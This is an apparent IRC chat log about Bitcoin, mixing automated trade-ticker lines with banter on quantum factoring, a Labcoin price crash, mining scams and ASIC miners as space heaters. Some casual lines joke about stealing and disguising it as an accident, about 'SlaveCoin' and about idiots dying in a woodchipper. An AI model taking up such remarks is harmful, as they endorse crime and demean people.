15 00:42:36 Thank you Sep 15 00:42:49 i'm hazarding that someone with oodles of resources may have come up with a fast way to factor big integers Sep 15 00:43:22 there's no proof of that any more that there's proof of elvis still being alive. Sep 15 00:43:26 that aside, sure. Sep 15 00:43:40 sure, and the nazis had no proof that the enigma was cracked until they lost Sep 15 00:43:47 actually they did. Sep 15 00:44:00 chose to neglect it, much like the us had ample warning re the 2001 attacks and chose to ignore it. Sep 15 00:44:34 ^^ sarcasm Sep 15 00:44:44 and importantly, i'm not aware there's a "quantum computer community" Sep 15 00:44:49 seeing how there;'s no quantum computers. Sep 15 00:44:54 computing, sir. Sep 15 00:44:56 there was no ipad community cca 1992. Sep 15 00:45:20 there was no turing machine before turing built it, and yet he was working on computation before that machine existed. Sep 15 00:45:33 that's true. Sep 15 00:45:55 (except he didn't build anything as the t machine is an abstraction, but anyway) Sep 15 00:46:13 so if someone who understands how bits flopping back and forth and existing in superposition can be knotted together into a theoretical computation device... Sep 15 00:46:25 i'd be willing to accept their claims that they work on quantum computation Sep 15 00:46:26 http://arxiv.org/list/quant-ph/recent Sep 15 00:47:01 even if the device doesn't exist, and nominally simulating codebases are hard to test Sep 15 00:47:31 http://www.amazon.com/Quantum-Circuit-Simulation-George-Viamontes/dp/9048130646 Sep 15 00:47:34 i dunno Sep 15 00:47:37 still researching Sep 15 00:48:11 also keep in mind the observation that it is quite common for people with no ability and no understanding to try and compensate through the imaginary creation of "communities" like minded Sep 15 00:48:16 so called social proof. Sep 15 00:48:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0197 BTC [-] Sep 15 00:49:10 sure Sep 15 00:49:17 i'm reading papers though not twitter Sep 15 00:49:34 although they could just as easily be just as worthless Sep 15 00:49:56 [HAVELOCK] [LABCO] 2 @ 0.00228 = 0.0046 BTC [-] Sep 15 00:50:07 "papers are to tweets as academics are to americans" Sep 15 00:50:41 it's extremely difficult to evaluate claims of quantum computing in a theoretical sense. Sep 15 00:50:53 the only way this will be resolved is through the making of prototypes. Sep 15 00:50:57 yup Sep 15 00:51:03 which is why research. Sep 15 00:52:52 [BTCTC] [DMS.SELLING] 17 @ 0.009261 = 0.1574 BTC [-] Sep 15 00:54:12 us public schools should include bargaining classes. Sep 15 00:54:23 it's the one skill poor people most desperately need and most utterly lack. Sep 15 00:59:42 [BTCTC] [LABCOIN] 38 @ 0.002114 = 0.0803 BTC [+] Sep 15 00:59:43 [BTCTC] [LABCOIN] 389 @ 0.002113 = 0.822 BTC [-] Sep 15 00:59:45 [BTCTC] [LABCOIN] 23 @ 0.002112 = 0.0486 BTC [-] Sep 15 00:59:46 [BTCTC] [LABCOIN] 238 @ 0.002111 = 0.5024 BTC [-] Sep 15 00:59:47 [BTCTC] [LABCOIN] 10 @ 0.002103 = 0.021 BTC [-] Sep 15 00:59:48 [BTCTC] [LABCOIN] 100 @ 0.002102 = 0.2102 BTC [-] Sep 15 00:59:49 [BTCTC] [LABCOIN] 8 @ 0.0021 = 0.0168 BTC [-] Sep 15 00:59:50 [BTCTC] [LABCOIN] 7 @ 0.002096 = 0.0147 BTC [-] Sep 15 00:59:51 [BTCTC] [LABCOIN] 74 @ 0.002095 = 0.155 BTC [-] Sep 15 00:59:52 [BTCTC] [LABCOIN] 9 @ 0.002086 = 0.0188 BTC [-] Sep 15 00:59:53 [BTCTC] [LABCOIN] 96 @ 0.002085 = 0.2002 BTC [-] Sep 15 00:59:54 [BTCTC] [LABCOIN] 200 @ 0.002073 = 0.4146 BTC [-] Sep 15 00:59:55 [BTCTC] [LABCOIN] 2000 @ 0.002072 = 4.144 BTC [-] Sep 15 00:59:56 [BTCTC] [LABCOIN] 6 @ 0.002072 = 0.0124 BTC [-] Sep 15 00:59:57 [BTCTC] [LABCOIN] 110 @ 0.002071 = 0.2278 BTC [-] Sep 15 00:59:58 [BTCTC] [LABCOIN] 1000 @ 0.00207 = 2.07 BTC [-] Sep 15 00:59:59 [BTCTC] [LABCOIN] 100 @ 0.002069 = 0.2069 BTC [-] Sep 15 00:59:59 [BTCTC] [LABCOIN] 9 @ 0.002053 = 0.0185 BTC [-] Sep 15 01:00:01 [BTCTC] [LABCOIN] 97 @ 0.002052 = 0.199 BTC [-] Sep 15 01:00:02 [BTCTC] [LABCOIN] 24 @ 0.002043 = 0.049 BTC [-] Sep 15 01:00:03 [BTCTC] [LABCOIN] 245 @ 0.002042 = 0.5003 BTC [-] Sep 15 01:00:04 [BTCTC] [LABCOIN] 4 @ 0.002041 = 0.0082 BTC [-] Sep 15 01:00:05 [BTCTC] [LABCOIN] 40 @ 0.00204 = 0.0816 BTC [-] Sep 15 01:00:06 [BTCTC] [LABCOIN] 8 @ 0.002038 = 0.0163 BTC [-] Sep 15 01:00:07 [BTCTC] [LABCOIN] 89 @ 0.002037 = 0.1813 BTC [-] Sep 15 01:00:09 [BTCTC] [LABCOIN] 9 @ 0.002036 = 0.0183 BTC [-] Sep 15 01:00:10 [BTCTC] [LABCOIN] 99 @ 0.002035 = 0.2015 BTC [-] Sep 15 01:00:18 [BTCTC] [LABCOIN] 475 @ 0.002032 = 0.9652 BTC [-] Sep 15 01:00:18 [BTCTC] [LABCOIN] 4750 @ 0.002031 = 9.6473 BTC [-] Sep 15 01:00:20 [BTCTC] [LABCOIN] 567 @ 0.00203 = 1.151 BTC [-] Sep 15 01:00:21 [BTCTC] [LABCOIN] 5696 @ 0.002029 = 11.5572 BTC [-] Sep 15 01:00:22 [BTCTC] [LABCOIN] 6600 @ 0.002028 = 13.3848 BTC [-] Sep 15 01:00:23 [BTCTC] [LABCOIN] 50 @ 0.002027 = 0.1014 BTC [-] Sep 15 01:00:25 [BTCTC] [LABCOIN] 500 @ 0.002026 = 1.013 BTC [-] Sep 15 01:00:26 [BTCTC] [LABCOIN] 963 @ 0.002025 = 1.9501 BTC [-] Sep 15 01:00:27 [BTCTC] [LABCOIN] 300 @ 0.002025 = 0.6075 BTC [-] Sep 15 01:00:28 [BTCTC] [LABCOIN] 4217 @ 0.002024 = 8.5352 BTC [-] Sep 15 01:00:54 I can't bargain apparently. Sep 15 01:01:12 Well it hardly ever works. Sep 15 01:01:29 i thought all you did was hunt bargains Sep 15 01:01:43 [BTCTC] [LABCOIN] 7 @ 0.0022 = 0.0154 BTC [+] Sep 15 01:01:52 oh... not that kind of bargain. Sep 15 01:02:09 poor people need to learn to hustle Sep 15 01:02:11 Bargain as in haggling. Sep 15 01:02:18 just steal a bunch of shit Sep 15 01:02:23 make it look like an accident Sep 15 01:02:25 [BTCTC] [LABCOIN] 289 @ 0.002038 = 0.589 BTC [-] Sep 15 01:02:25 [BTCTC] [LABCOIN] 100 @ 0.002034 = 0.2034 BTC [-] Sep 15 01:02:26 boom you are no longer poor Sep 15 01:02:27 [BTCTC] [LABCOIN] 233 @ 0.002024 = 0.4716 BTC [-] Sep 15 01:02:28 [BTCTC] [LABCOIN] 1000 @ 0.002021 = 2.021 BTC [-] Sep 15 01:02:29 [BTCTC] [LABCOIN] 500 @ 0.00202 = 1.01 BTC [-] Sep 15 01:02:30 [BTCTC] [LABCOIN] 99 @ 0.002018 = 0.1998 BTC [-] Sep 15 01:02:31 [BTCTC] [LABCOIN] 700 @ 0.002015 = 1.4105 BTC [-] Sep 15 01:02:32 [BTCTC] [LABCOIN] 600 @ 0.002011 = 1.2066 BTC [-] Sep 15 01:02:33 [BTCTC] [LABCOIN] 2500 @ 0.00201 = 5.025 BTC [-] Sep 15 01:02:34 [BTCTC] [LABCOIN] 3425 @ 0.00201 = 6.8843 BTC [-] Sep 15 01:02:35 [BTCTC] [LABCOIN] 3000 @ 0.002007 = 6.021 BTC [-] Sep 15 01:02:35 Goodbye labcoin Sep 15 01:02:35 [BTCTC] [LABCOIN] 95 @ 0.002001 = 0.1901 BTC [-] Sep 15 01:02:36 [BTCTC] [LABCOIN] 114 @ 0.002 = 0.228 BTC [-] Sep 15 01:02:37 [BTCTC] [LABCOIN] 25000 @ 0.002 = 50 BTC [-] Sep 15 01:02:38 [BTCTC] [LABCOIN] 8000 @ 0.001996 = 15.968 BTC [-] Sep 15 01:02:39 [BTCTC] [LABCOIN] 98 @ 0.001985 = 0.1945 BTC [-] Sep 15 01:02:40 [BTCTC] [LABCOIN] 100 @ 0.001969 = 0.1969 BTC [-] Sep 15 01:02:41 [BTCTC] [LABCOIN] 99 @ 0.001953 = 0.1933 BTC [-] Sep 15 01:02:42 [BTCTC] [LABCOIN] 1 @ 0.00195 BTC [-] Sep 15 01:02:43 [BTCTC] [LABCOIN] 96 @ 0.001937 = 0.186 BTC [-] Sep 15 01:02:44 [BTCTC] [LABCOIN] 96 @ 0.001921 = 0.1844 BTC [-] Sep 15 01:02:44 [BTCTC] [LABCOIN] 1000 @ 0.001919 = 1.919 BTC [-] Sep 15 01:02:45 [BTCTC] [LABCOIN] 2000 @ 0.001918 = 3.836 BTC [-] Sep 15 01:02:46 [BTCTC] [LABCOIN] 714 @ 0.001913 = 1.3659 BTC [-] Sep 15 01:02:47 [BTCTC] [LABCOIN] 135 @ 0.001912 = 0.2581 BTC [-] Sep 15 01:02:48 [BTCTC] [LABCOIN] 1000 @ 0.00191 = 1.91 BTC [-] Sep 15 01:02:49 [BTCTC] [LABCOIN] 400 @ 0.001908 = 0.7632 BTC [-] Sep 15 01:02:50 [BTCTC] [LABCOIN] 200 @ 0.001902 = 0.3804 BTC [-] Sep 15 01:02:51 [BTCTC] [LABCOIN] 2000 @ 0.001902 = 3.804 BTC [-] Sep 15 01:02:52 [BTCTC] [LABCOIN] 1000 @ 0.001901 = 1.901 BTC [-] Sep 15 01:02:53 [BTCTC] [LABCOIN] 2627 @ 0.0019 = 4.9913 BTC [-] Sep 15 01:02:54 [BTCTC] [LABCOIN] 100 @ 0.0019 = 0.19 BTC [-] Sep 15 01:02:55 [BTCTC] [LABCOIN] 1100 @ 0.0019 = 2.09 BTC [-] Sep 15 01:02:56 [BTCTC] [LABCOIN] 1480 @ 0.0019 = 2.812 BTC [-] Sep 15 01:02:57 [BTCTC] [LABCOIN] 1 @ 0.0019 BTC [-] Sep 15 01:02:58 [BTCTC] [LABCOIN] 1000 @ 0.0019 = 1.9 BTC [-] Sep 15 01:02:59 [BTCTC] [LABCOIN] 690 @ 0.001888 = 1.3027 BTC [-] Sep 15 01:03:00 [BTCTC] [LABCOIN] 677 @ 0.001854 = 1.2552 BTC [-] Sep 15 01:03:01 [BTCTC] [LABCOIN] 200 @ 0.001854 = 0.3708 BTC [-] Sep 15 01:03:02 [BTCTC] [LABCOIN] 10 @ 0.001852 = 0.0185 BTC [-] Sep 15 01:03:03 [BTCTC] [LABCOIN] 100 @ 0.001851 = 0.1851 BTC [-] Sep 15 01:03:04 [BTCTC] [LABCOIN] 700 @ 0.00185 = 1.295 BTC [-] Sep 15 01:03:05 [BTCTC] [LABCOIN] 4721 @ 0.00185 = 8.7339 BTC [-] Sep 15 01:03:10 i like how we're all sitting here watching this actually happen Sep 15 01:04:00 Ohhhhh... you broke it Sep 15 01:04:32 good price to enter for extreme risk takers Sep 15 01:04:47 I'll take 25 btc worth Sep 15 01:04:49 BROKER BROKER Sep 15 01:04:51 BUY BUY BUY Sep 15 01:05:06 hehe Sep 15 01:06:21 "good price to enter for extreme risk takers" -> "excellent way to waste your btc" Sep 15 01:06:46 i know of better ways Sep 15 01:07:57 donate to the nsa-tor-bitcoin foundation ? Sep 15 01:08:23 im not telling for free! Sep 15 01:08:34 oh i agree MP Sep 15 01:08:45 it's not even investing at this point it's gambling on long odds Sep 15 01:11:52 [BTCTC] [KENILWORTH] 10 @ 0.001784 = 0.0178 BTC [+] Sep 15 01:12:54 [BTCTC] [LABCOIN] 1000 @ 0.002091 = 2.091 BTC [+] Sep 15 01:13:09 [BTCTC] [LABCOIN] 580 @ 0.002089 = 1.2116 BTC [-] Sep 15 01:13:11 [BTCTC] [LABCOIN] 420 @ 0.002095 = 0.8799 BTC [+] Sep 15 01:14:14 [BTCTC] [LABCOIN] 1 @ 0.002087 BTC [-] Sep 15 01:14:15 [BTCTC] [LABCOIN] 1 @ 0.002088 BTC [+] Sep 15 01:14:16 [BTCTC] [LABCOIN] 10 @ 0.002088 = 0.0209 BTC [+] Sep 15 01:15:05 [BTCTC] [LABCOIN] 10 @ 0.002088 = 0.0209 BTC [+] Sep 15 01:18:11 [MPEX] [S.MPOE] 1032 @ 0.00089157 = 0.9201 BTC [-] Sep 15 01:18:13 [MPEX] [S.MPOE] 1863 @ 0.0008905 = 1.659 BTC [-] Sep 15 01:21:45 mircea_popescu why can't we create an underground bitcoin foundation Sep 15 01:21:53 the bitcoin anti-foundation Sep 15 01:22:06 oh yea I forgot we have one: MPEx Sep 15 01:22:10 what would such contraption do? Sep 15 01:22:20 it would act a woodchipper Sep 15 01:22:25 idiots would be attracted to it right? Sep 15 01:22:33 they would put their arms into said woodchipper Sep 15 01:22:34 AND DIE Sep 15 01:22:44 eventually all the idiots will be consumed by the woodchipper Sep 15 01:22:50 yes we have one: MPEx Sep 15 01:24:30 if you think about it, a foundation is exactly antithetical to bitcoin. Sep 15 01:24:46 [BTCTC] [ACTIVEMINING] 10 @ 0.002742 = 0.0274 BTC [+] Sep 15 01:24:47 what the fuck does a distributed network need a spokesperson for ? it doesn't. it's the government that needs someone to talk to. Sep 15 01:24:48 [BTCTC] [ACTIVEMINING] 10 @ 0.002743 = 0.0274 BTC [+] Sep 15 01:24:49 [BTCTC] [ACTIVEMINING] 420 @ 0.002755 = 1.1571 BTC [+] Sep 15 01:24:59 it's nice that some people have stepped up to waste govt's time to no avail. Sep 15 01:25:07 it's not nice they;'re also scammy fucks, but what can you expect. Sep 15 01:25:14 it's the sort of endeavour that attracts the failful. Sep 15 01:28:38 https://bitcointalk.org/index.php?topic=263445.msg3155468#msg3155468 wow, I didn't see those earlier Sep 15 01:29:51 i can't decide what they sound like more: desperate scammers, or desperate incompetents Sep 15 01:30:19 they think this is what "professional" means. Sep 15 01:30:36 ;;bc,stats Sep 15 01:30:39 Current Blocks: 258037 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 10 blocks | Next Difficulty In About: 1 hour, 4 minutes, and 0 seconds | Next Difficulty Estimate: 112715054.591 | Estimated Percent Change: 29.65736 Sep 15 01:30:54 "Probably no more pictures as they only do create more confusion." clearly what they need now is even LESS communication Sep 15 01:31:12 labcoin is the gift that keeps on giving, AmAZING COMPANY Sep 15 01:31:13 AMAZING COMPANY! Sep 15 01:31:19 Duffer1 this is an old scammor trick. it goes like this : Sep 15 01:31:21 high five assbot Sep 15 01:31:26 [BTCTC] [BASIC-MINING] 1 @ 0.1166 BTC [-] Sep 15 01:31:36 [BTCTC] [BASIC-MINING] 3 @ 0.1165 = 0.3495 BTC [-] Sep 15 01:31:38 [BTCTC] [BASIC-MINING] 5 @ 0.1166 = 0.583 BTC [+] Sep 15 01:31:45 step 1 : no proofs. people clearly delineate whart proof is needed. step 2 : list of irrelevant crud masquerading as response to step 1. people clearly delineate why this doesn't qualify Sep 15 01:31:50 [BTCTC] [BASIC-MINING] 2 @ 0.1166 = 0.2332 BTC [+] Sep 15 01:31:56 step 3 : no further attempts because "it creates confusion". Sep 15 01:32:08 oh i know man Sep 15 01:32:11 more pictures would disturb their chi Sep 15 01:32:19 iirc bfl did exact same thing. Sep 15 01:32:46 arguably with more success, owing to the relative cluelesness of teh forum tardcloud pre mpoe-pr & other meanines. Sep 15 01:33:33 [HAVELOCK] [CBTC] 10 @ 0.0003801 = 0.0038 BTC [-] Sep 15 01:33:36 [HAVELOCK] [CBTC] 1290 @ 0.00038 = 0.4902 BTC [-] Sep 15 01:34:36 [BTCTC] [DMS.PURCHASE] 1 @ 0.01193 BTC [+] Sep 15 01:36:11 [BTCTC] [DMS.SELLING] 1 @ 0.009431 BTC [+] Sep 15 01:36:46 [BTCTC] [BASIC-MINING] 1 @ 0.1164 BTC [-] Sep 15 01:37:15 [BTCTC] [DMS.PURCHASE] 1 @ 0.01193 BTC [+] Sep 15 01:38:23 [BTCTC] [LABCOIN] 100 @ 0.002043 = 0.2043 BTC [-] Sep 15 01:38:35 [BTCTC] [DMS.PURCHASE] 1 @ 0.01193 BTC [+] Sep 15 01:39:54 [BTCTC] [B.YABMC] 3 @ 0.0012 = 0.0036 BTC [+] Sep 15 01:39:56 [BTCTC] [LABCOIN] 20 @ 0.00204 = 0.0408 BTC [-] Sep 15 01:40:28 sadly looking at the labcorn thread I can't see her having made any impact Sep 15 01:42:18 i prefer to look at bitcoin flows rather than the crazy threads. Sep 15 01:42:22 saves on depression medicine. Sep 15 01:42:55 anyone link to a good discussion of how mining itself (unless you're 2 or 3 steps ahead of the plebes' game tech-wise) is a scam? Sep 15 01:43:13 [BTCTC] [DMS.MINING] 1 @ 0.002583 BTC [+] Sep 15 01:43:25 or is this simply too obvious for an interesting conversation... Sep 15 01:43:32 [BTCTC] [DMS.PURCHASE] 1 @ 0.01193 BTC [+] Sep 15 01:43:33 actually./.. the chick has something. Sep 15 01:43:41 mining is a scam now? Sep 15 01:43:59 even milk is scam now. Sep 15 01:44:07 scam in the sense of being a 'race to the bottom' Sep 15 01:44:17 scammers everywhere... Sep 15 01:44:25 [BTCTC] [NASTY-PT] 1 @ 0.001787 BTC [+] Sep 15 01:44:28 milk was always a scam Sep 15 01:44:29 https://bitcointalk.org/index.php?topic=201268.msg2121475#msg2121475 Sep 15 01:44:33 where the only people guaranteed to profit are the hardware vendors (and the truly heroic profits go to vapourware vendors) Sep 15 01:44:42 try that. it's originally buffett's. Sep 15 01:44:42 I called milk back in 19dickety2 Sep 15 01:45:04 theres not really any scamming going on imo Sep 15 01:45:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000635 BTC [+] Sep 15 01:45:15 not really, no. Sep 15 01:45:23 just a alot of idiots donating heavily to their own education Sep 15 01:46:05 haahaha Sep 15 01:46:36 and of course the gamblers trying to win the idiots money Sep 15 01:47:09 asciilifeform: eventually the hardware will be cheap enough to put in waterheaters and floor tiles. that's the endgame. none of this humans mining shit. Sep 15 01:48:12 [BTCTC] [COGNITIVE] 2 @ 0.2202 = 0.4404 BTC [-] Sep 15 01:48:14 [BTCTC] [COGNITIVE] 10 @ 0.22 = 2.2 BTC [-] Sep 15 01:48:15 [BTCTC] [COGNITIVE] 2 @ 0.2159 = 0.4318 BTC [-] Sep 15 01:48:16 [BTCTC] [COGNITIVE] 1 @ 0.2105 BTC [-] Sep 15 01:48:17 benkay: no matter what you do, resistance heat coils are still cheaper - if only because nobody cancelled thermodynamics (look up how many joules it takes to fab even 1970s silicon.) Sep 15 01:48:18 [BTCTC] [COGNITIVE] 1 @ 0.2104 BTC [-] Sep 15 01:48:19 [BTCTC] [COGNITIVE] 1 @ 0.2076 BTC [-] Sep 15 01:48:20 [BTCTC] [COGNITIVE] 20 @ 0.2 = 4 BTC [-] Sep 15 01:48:20 [BTCTC] [COGNITIVE] 1 @ 0.196 BTC [-] Sep 15 01:48:21 [BTCTC] [COGNITIVE] 5 @ 0.196 = 0.98 BTC [-] Sep 15 01:48:22 [BTCTC] [COGNITIVE] 20 @ 0.195 = 3.9 BTC [-] Sep 15 01:48:36 except in opex Sep 15 01:48:39 and by the time we get the ASIC water heater, it will yield - what - a satoshi a day? Sep 15 01:48:43 classic arms race Sep 15 01:48:50 you still have to dump heat in Sep 15 01:48:52 er Sep 15 01:48:54 juice Sep 15 01:48:58 you still have to dump juice in Sep 15 01:49:07 consider 2 systems, one marginally less efficient Sep 15 01:49:14 benkay: I was talking about the amount of energy spent in producing the chips Sep 15 01:49:50 this is invariably many times more than the energy (or materials) cost of making an ordinary coil heater. Sep 15 01:50:00 sure, sure. Sep 15 01:50:10 this is a flawed argument. Sep 15 01:50:23 o yes? Sep 15 01:50:44 it's true that fabing has a significant upfront cost, but at stake is not an improvement in energy efficiency, Sep 15 01:50:49 [HAVELOCK] [SDSTM] 5 @ 0.00249 = 0.0125 BTC [+] Sep 15 01:50:51 at stake is production of something unrelated. Sep 15 01:50:55 as such prices will float to balance. Sep 15 01:51:27 the argument i was trying to make is that mining needs a certain minimal return for it to make sense even as a space heater replacement. Sep 15 01:51:42 it does have that by default by the time people are putting it in as space heating Sep 15 01:51:48 somehow begging the question, this thing. Sep 15 01:52:28 i mean, at some point in the none-too-distant future, the expected yield is... zero? correct? Sep 15 01:52:39 u has space heater; either it also makes money or it doesn't. hard choice, neh? Sep 15 01:52:48 it's never zero, no. Sep 15 01:53:10 in the not-so-distant future electric power, nuclear and solar, will be all the power we ever use. Sep 15 01:53:12 in addition to coinbases there are also txn fees Sep 15 01:53:16 benkay: assuming the chips already exist (their cost of manufacture, in terms of energy and materials) has already been paid. Sep 15 01:53:40 yes, let's do assume that Sep 15 01:54:12 in that someone rounded up a pile of capital to build absolutely sufficient boards and are now going to sell those boards as heaters to building builders and renovators, recouping their capital by capturing the coins so generated Sep 15 01:54:13 question then is: ebay is chock-full of FPGA miner rigs being sold off for pennies on the dollar. why isn't anyone buying them up for use as space heaters? Sep 15 01:54:34 market inefficiencies. i don't have bandwidth to do everything myself. Sep 15 01:54:47 although fpga arrays are how i'm going to heat the next office Sep 15 01:55:17 asciilifeform because the marginal gain is not quite enough yet, and they're noisy, clumsy and unwieldy. Sep 15 01:55:21 basically, they're a prototype. Sep 15 01:55:38 that aside, people still mine on fpgas, strictly because in the winter it warms. Sep 15 01:55:52 ding ding ding Sep 15 01:56:17 there's also some return in housing fpgas by wind farms and burning electricity for them Sep 15 01:56:28 but again, that personal bandwidth problem :( Sep 15 01:56:42 (fpga's or loosened out asics...w/e) Sep 15 01:57:04 benkay: the windmill would probably rake in more profit by selling the joules back to the local power co. (at least in countries where this is practiced.) Sep 15 01:57:16 limited by local power grid Sep 15 01:57:31 frequently grid is incapable of accepting further inputs Sep 15 01:57:44 winds blow at night Sep 15 01:57:48 but nobody runs ac at night Sep 15 01:57:52 it used to be profitable in France, cause local power co was forced to buy back at a crazy rate by law Sep 15 01:57:57 now it's no longer the case Sep 15 01:58:03 ergo cali wind farms are frequently idling during the nighttime Sep 15 01:58:44 still seems to be like cranking out ASIC water heaters will be a net thermodynamic loss at some point not too far off. and a thermodynamic loss can't be decoupled from financial loss forever Sep 15 01:59:45 sort of how we don't have prison inmates turning generators. thermo says it's a loss, so it's a loss. Sep 15 02:00:04 let's do the math for this, shall we ? power generation costs, about $100 per mw, yielding electricity, which transforms directly to heat at ~$100 per mj. Sep 15 02:00:10 i don't think we've drawn sufficiently rigorous boundaries around the various systems to talk like that, asciilifeform Sep 15 02:00:58 in the power + hash assembly you have suppose 200 dollars cost per mjoule, and generate 1th worth of hash. Sep 15 02:01:33 now, for as long as 1th mines 100 dollars worth of bitcoin, it is perfectly economical to heat with the miner tiles. Sep 15 02:01:50 mircea_popescu: sure Sep 15 02:01:55 mircea_popescu: for as long. Sep 15 02:01:58 and that 100 dollar allowance is incredibly generous, seeing how it's equal to everything power takes. Sep 15 02:02:05 such as you know, the plant, the lines, the transformers, etc. Sep 15 02:03:20 the only thing is you will need special designed chips to limit clock frequency so they may be passively cooled. Sep 15 02:03:23 lol people mine on fpga's Sep 15 02:03:26 something the current chips are not doing at all. Sep 15 02:03:27 cause in the winter it warms Sep 15 02:03:29 hahahahaha Sep 15 02:04:04 mircea_popescu: you could simply have a thermostat cycle power, a la traditional resistance heaters. Sep 15 02:04:18 mircea_popescu: chips will crack very soon, though. Sep 15 02:04:50 clock at 60khz is better than clock at 60mhz cycled Sep 15 02:05:02 yes, given that Si is brittle. Sep 15 02:05:07 yeah. Sep 15 02:05:14 you could simply push theturbo button when cold. Sep 15 02:05:18 recall the turbo button ? :D Sep 15 02:05:24 haha <3 turbo button Sep 15 02:06:11 actually the turbo on every 486 i've owned just turned off the cpu cache. the little LED freq. display was a lie. Sep 15 02:06:41 i had mine hacked to say 13/37 Sep 15 02:06:59 on an old 286 iirc, it was 16/32 originally Sep 15 02:08:05 yeah the jumpers. can make it say 'FU', whatever. Sep 15 02:08:14 :] Sep 15 02:09:35 one little tidbit: vs. a resistance heater, a BTC heater will piss out considerably more energy as RF. Sep 15 02:09:55 not so sure about that. Sep 15 02:10:44 modern VLSI is very rf-noisy. you could fix this by fabbing the ASICs as ECL (emitter coupled logic) Sep 15 02:10:47 the considerable part, i mean. for instance many resistors emit light when under working conditions Sep 15 02:11:08 this is visible to the nakled eye, but it doesn't come to significant emission in terms of energy Sep 15 02:11:19 a lightbulb even is mostly a heater rather than a rf source. Sep 15 02:11:56 lightbulb, yes. LED technowanker bulb with switched DC power supply, less so. Sep 15 02:12:12 well less so, but it ain't a resistor in any sense either so. Sep 15 02:12:15 anyone got a 'bomb calorimeter' and a few btc asics? Sep 15 02:12:42 ive not seen those since hs. Sep 15 02:14:28 buy a radio scanner (the $20 http://www.rtlsdr.org will do) and see how astoundingly 'rf-screaming' modern digital logic is. Sep 15 02:15:17 now, you could shield your tiles. power line will still radiate though. Sep 15 02:18:23 [BTCTC] [ASICMINER-PT] 1 @ 2.078 BTC [-] Sep 15 02:19:20 i don't see what diff it makes, outside of perhaps being the avenue through which govts will try and limit the practice if they somehow decide they want that Sep 15 02:19:32 "sorry you can't have asic heating because it interferences with the weasels" Sep 15 02:20:32 the difference is that at some point in the difficulty rise it will make more financial sense to run ordinary heaters. Sep 15 02:20:41 [BTCTC] [BASIC-MINING] 2 @ 0.125 = 0.25 BTC [+] Sep 15 02:21:22 [BTCTC] [BASIC-MINING] 6 @ 0.125 = 0.75 BTC [+] Sep 15 02:22:04 diff will level out though or at least get more predictable Sep 15 02:22:06 [BTCTC] [BASIC-MINING] 1 @ 0.1251 BTC [+] Sep 15 02:22:12 only if you consider diff increase decoupled from price increase. Sep 15 02:22:38 by the time asic tiles are available bitcoins are 100k-1mn per anyway. Sep 15 02:22:42 price will level out though or at least get more predictable Sep 15 02:22:53 dub your sex life will level out. Sep 15 02:23:33 so, end result is something like: you can buy a BTC water heater that puts out 1% of the joules put in as rf, and it buys you a lottery ticket a day. Sep 15 02:23:37 [BTCTC] [LABCOIN] 1 @ 0.001993 BTC [-] Sep 15 02:24:19 "you can either have low tech heating doing 99% efficiency for 100 dollars per unit, Sep 15 02:24:27 [BTCTC] [LABCOIN] 4 @ 0.001992 = 0.008 BTC [-] Sep 15 02:24:29 [BTCTC] [LABCOIN] 4 @ 0.001993 = 0.008 BTC [+] Sep 15 02:24:38 anyone feel like calculating the minimal energy cost of fabbing an asic? use a single die's worth of Si 'enthalpy of fusion' as the irreducible cost. Sep 15 02:24:43 or have high tech heating doing 99.5% efficiency and 38 to 72% money back over a year, at 500 dollars per unit" Sep 15 02:25:15 im sorry, i meant 98.5% Sep 15 02:26:06 mircea_popescu: i don't doubt that an asic heater would shit money if you installed one today. question is about the endgame. Sep 15 02:26:27 if you install it today that 38 to 72% money back reads more like 4500 to 95000% Sep 15 02:26:52 you will get roughly half the cost of your power usage back as bitcoin, i iamgine. Sep 15 02:27:05 [BTCTC] [LABCOIN] 4 @ 0.002006 = 0.008 BTC [+] Sep 15 02:27:12 we'd get to the end of the line considerably faster if the heater became standard equipment in every luser's house. Sep 15 02:27:30 "every luser" = rich white folk who can afford to pay 5x as much upfront. Sep 15 02:27:44 because that way they end up paying 25% less over 5 years. Sep 15 02:28:05 sorta like rooftop solar panels. Sep 15 02:28:10 indeed. Sep 15 02:28:12 anyone up for a solar cell / asic combo? Sep 15 02:28:13 [BTCTC] [NASTY-PT] 1 @ 0.001785 BTC [-] Sep 15 02:28:14 [BTCTC] [NASTY-PT] 99 @ 0.001786 = 0.1768 BTC [+] Sep 15 02:28:31 anyway, you seem to think the more hashing the worse off bitcoin is. Sep 15 02:28:39 this is not true either theoretically or in practice. Sep 15 02:28:46 no, the worse off the hashers are Sep 15 02:28:50 btc does fine in any case Sep 15 02:29:04 the EARLY hashers. Sep 15 02:29:11 [BTCTC] [NASTY-PT] 1 @ 0.001786 BTC [+] Sep 15 02:29:11 the game favours they who join in last at any time Sep 15 02:29:12 [BTCTC] [NASTY-PT] 10 @ 0.0018 = 0.018 BTC [+] Sep 15 02:29:13 [BTCTC] [NASTY-PT] 89 @ 0.001855 = 0.1651 BTC [+] Sep 15 02:29:14 reverse-ponzi like. Sep 15 02:29:23 so today the tiles will be sold at 500 dollars and the 5 year promise Sep 15 02:29:34 in a year 2x as good tiles will be sold also at 500 also on a 5 year promise Sep 15 02:29:35 and so on Sep 15 02:29:44 much like white folk's pensions, the best scam in the book Sep 15 02:29:44 ^ Sep 15 02:29:52 mircea_popescu: entirely true, until you get down to the enthalpy-of-fusion-of-Si price point for the asics. Sep 15 02:30:01 make people pay now for benefits later, which they believe in because it's the founding myth of their civilisation. Sep 15 02:31:17 ;;calc 500 * 0.00116 Sep 15 02:31:17 0.58 Sep 15 02:31:19 damn it all, i'm still waiting for SlaveCoin. Sep 15 02:31:25 sane people are not paying for hashing now Sep 15 02:31:30 slavecoin also heats the space. Sep 15 02:31:48 does other useful & necessary thing around the house, too. Sep 15 02:32:12 [MPEX] [S.MPOE] 7071 @ 0.00089221 = 6.3088 BTC [+] Sep 15 02:32:14 [MPEX] [S.MPOE] 2853 @ 0.00089247 = 2.5462 BTC [+] Sep 15 02:34:19 [BTCTC] [DMS.SELLING] 40 @ 0.009431 = 0.3772 BTC [+] Sep 15 02:34:30 [BTCTC] [LABCOIN] 12 @ 0.001903 = 0.0228 BTC [-] Sep 15 02:34:32 [BTCTC] [LABCOIN] 249 @ 0.001902 = 0.4736 BTC [-] Sep 15 02:34:33 [BTCTC] [LABCOIN] 9000 @ 0.0019 = 17.1 BTC [-] Sep 15 02:34:34 [BTCTC] [LABCOIN] 1050 @ 0.001893 = 1.9877 BTC [-] Sep 15 02:35:38 [BTCTC] 